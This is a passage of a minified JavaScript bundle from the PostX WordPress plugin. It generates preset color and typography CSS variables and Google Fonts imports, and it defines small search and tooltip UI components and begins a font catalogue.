a=n(2030);const{__}=wp.i18n,r=(e,t,n,a)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:n}}).then((r=>{r.success&&("set"==e&&i(t,n),a&&a(r))}))},o=(e,t="",n=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((a,r)=>{if(!["rootCSS","globalColorCSS"].includes(a)){const r=a,o=t[a]?.hasOwnProperty("openColor")?"color"==t[a].type?t[a].color:t[a].gradient:t[a]||n||"";e+=`--postx_preset_${r}: ${o}; `}})),e+=" }",e}if("typoCSS"==e){const e=o("multipleTypos");let r="",i=":root { ";const l=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return Object.keys(t).forEach(((o,s)=>{const p=t[o],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(o);if(!["rootCSS","presetTypoCSS"].includes(o)&&"object"==typeof p&&Object.keys(p).length){const e=!l.includes(p.family),t=n?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!r.includes(p.family.replace(" ","+")+":")&&void 0!==a.Z&&(r+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(a.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(i+=p.family?`--postx_preset_${o}_font_family: ${p.family}; `:"",i+=p.family?`--postx_preset_${o}_font_family_type: ${p.type||"sans-serif"}; `:"",i+=p.weight?`--postx_preset_${o}_font_weight: ${p.weight}; `:"",i+=p.style?`--postx_preset_${o}_font_style: ${p.style}; `:"",i+=p.decoration?`--postx_preset_${o}_text_decoration: ${p.decoration}; `:"",i+=p.transform?`--postx_preset_${o}_text_transform: ${p.transform}; `:"",i+=p.spacing?.lg?`--postx_preset_${o}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",i+=p.spacing?.sm?`--postx_preset_${o}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",i+=p.spacing?.xs?`--postx_preset_${o}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),i+=p.size?.lg?`--postx_preset_${o}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",i+=p.size?.sm?`--postx_preset_${o}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",i+=p.size?.xs?`--postx_preset_${o}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",i+=p.height?.lg?`--postx_preset_${o}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",i+=p.height?.sm?`--postx_preset_${o}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",i+=p.height?.xs?`--postx_preset_${o}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),i+="}",r+i}if("font_load"==e){let e="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=n?ultp_dashboard_pannel:ultp_data,o=!((!r.settings?.hasOwnProperty("disable_google_font")||"yes"==r.settings.disable_google_font)&&r.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const n=!a.includes(t.family);o&&n&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let a="";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],o=n?ultp_dashboard_pannel:ultp_data,i=!((!o.settings?.hasOwnProperty("disable_google_font")||"yes"==o.settings.disable_google_font)&&o.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,n)=>{const o=!r.includes(e);i&&o&&e&&(a+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[n]+"'); ")})),a}if("bgCSS"==e){let e={};const n="object"==typeof t?{...t}:{};if("color"==n.type)e.backgroundColor=n.color;else if("gradient"==n.type&&n.gradient){let t=n.gradient;"object"==typeof n.gradient&&(t="linear"==n.gradient.type?"linear-gradient("+n.gradient.direction+"deg, "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);":"radial-gradient( circle at "+n.gradient.radial+" , "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==n.type){var r;(n.fallbackColor||n.color)&&(e.backgroundColor=null!==(r=n.fallbackColor)&&void 0!==r?r:n.color),n.image&&(e.backgroundImage='url("'+n.image+'")',n.position&&(e.backgroundPositionX=100*n.position.x+"%",e.backgroundPositionY=100*n.position.y+"%"),n.attachment&&(e.backgroundAttachments=n.attachment),n.repeat&&(e.backgroundRepeat=n.repeat),n.size&&(e.backgroundSize=n.size))}else"video"==n.type&&n.fallback&&(e.backgroundImage='url("'+n.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var n;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(n=e.fallbackColor)&&void 0!==n?n:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n                font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},i=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},l=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},2402:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(4201);const r=({searchQuery:e,setSearchQuery:t,setTemplateModule:n,changeStates:r})=>(0,a.createElement)("div",{className:"ultp-design-search-wrapper"},(0,a.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),n&&n(""),r&&r("search",e.target.value)}}))},3100:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(2044);const r=(e,t,n,r)=>(0,a.Z)({url:e||null,utmKey:t||null,affiliate:n||null,hash:r||null})},4190:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2158);const r=e=>{let t;const[n,r]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:`ultp-tooltip-wrapper ${e.extraClass}`,onMouseEnter:()=>{t=setTimeout((()=>{r(!0)}),e.delay||400)},onMouseLeave:()=>{clearInterval(t),r(!1)}},e.children,n&&(0,a.createElement)("div",{className:`tooltip-content ${e.direction||"top"}`},e.content))}},2030:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic 